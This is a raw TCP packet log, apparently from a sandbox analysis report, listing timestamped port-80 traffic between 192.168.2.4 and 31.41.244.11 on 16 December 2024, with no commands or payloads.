                                                                                                                                                                                              Dec 16, 2024 01:01:26.757786989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.757839918 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.758505106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.758610010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.758924007 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.758963108 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.759363890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.759407043 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.759497881 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.759543896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.760215044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.760261059 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.760307074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.760344028 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.761045933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.761092901 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.761182070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.761275053 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.761902094 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.761950016 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.762015104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.762088060 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.762725115 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.762768984 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.762864113 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.762902021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.763573885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.763619900 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.763631105 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.763670921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.764379978 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.764424086 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.764447927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.764491081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.765239000 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.765290976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.765469074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.765520096 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.766086102 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.766129017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.766145945 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.766181946 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.766911983 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.766957998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.767002106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.767043114 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.767762899 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.767802954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.768101931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.768146038 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.768587112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.768640041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.768712044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.768841028 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.769440889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.769464970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.769494057 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.769506931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.770241022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.770363092 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.770391941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.770410061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.771092892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.771162033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.771186113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.771204948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.772192955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.772258043 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.772274017 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.772315979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.772779942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.772825003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.773257017 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.773303032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.773596048 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.773801088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.773853064 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.774441957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.774497032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.774529934 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.774566889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.775281906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.775324106 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.775800943 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.775841951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.776238918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.776257038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.776285887 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.776304007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.777267933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.777311087 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.777436972 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.777477026 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.777822018 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.777859926 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.777895927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.777935982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.778681040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.778738976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.778930902 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.778970957 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.780612946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.780679941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.780711889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.780729055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.780755997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.780769110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.780930996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.780975103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.781179905 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.781277895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.781346083 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.782022953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.782038927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.782064915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.782099962 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.782840014 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.782886028 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.783241034 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.783324957 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.783699036 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.783741951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.784559965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.784576893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.784615040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.784699917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.785192966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.785370111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.785396099 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.785410881 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.785439014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.786211967 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.786257982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.786346912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.786433935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.787040949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.787082911 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.787341118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.787381887 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.787870884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.787934065 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.787951946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.787992001 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.788726091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.788789034 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.788809061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.788851976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.789572001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.789628029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.789709091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.789805889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.790416002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.790476084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.790514946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.790574074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.791234970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.791279078 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.791452885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.791490078 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.792082071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.792143106 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.792174101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.792323112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.792927980 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.792979956 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.792984009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.793018103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.793749094 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.793804884 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.794048071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.794116020 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.794595957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.794648886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.794677019 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.794718027 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.795464993 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.795510054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.876451969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.876480103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.876529932 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.876773119 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.876826048 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.877341986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.877485037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.877543926 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.878256083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.878304958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.878351927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.878443003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.946794033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947134018 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947139025 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947155952 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947181940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947191000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947860003 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947877884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947904110 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947923899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.947947025 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.948596954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.948656082 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.948950052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.948986053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.949001074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.949026108 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.949747086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.949803114 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.950184107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.950229883 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.950572968 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.950617075 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.951060057 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.951112032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.951416016 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.951843977 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.951894045 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.952265978 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.952316999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.952347040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.952385902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.953099012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.953145027 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.953233957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.953277111 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.953924894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.953969955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.954813004 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.954830885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.954858065 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.954879999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.954905033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.955091000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.955612898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.955658913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.955801964 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.955847025 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.956494093 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.956511021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.956537962 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.956554890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.957294941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.958164930 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.958180904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.958209038 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.958239079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.958260059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.958651066 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.958993912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.959011078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.959043026 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.959060907 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.959815979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.959875107 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.960582972 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.960629940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.960675001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.960690975 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.960719109 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.960733891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.961488962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.961535931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.962373018 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.962388992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.962431908 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.962452888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.962496996 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.963211060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.963227034 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.963268995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.964021921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.964068890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.964873075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.964889050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.964919090 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.964934111 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.964971066 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.965676069 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.965720892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.966371059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.966418028 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.966537952 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.966581106 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.967423916 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.967439890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.967483997 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.967485905 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.967525959 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.968204021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.968250036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.968916893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.968961000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.969074965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.969091892 CET804980031.41.244.11192.168.2.4
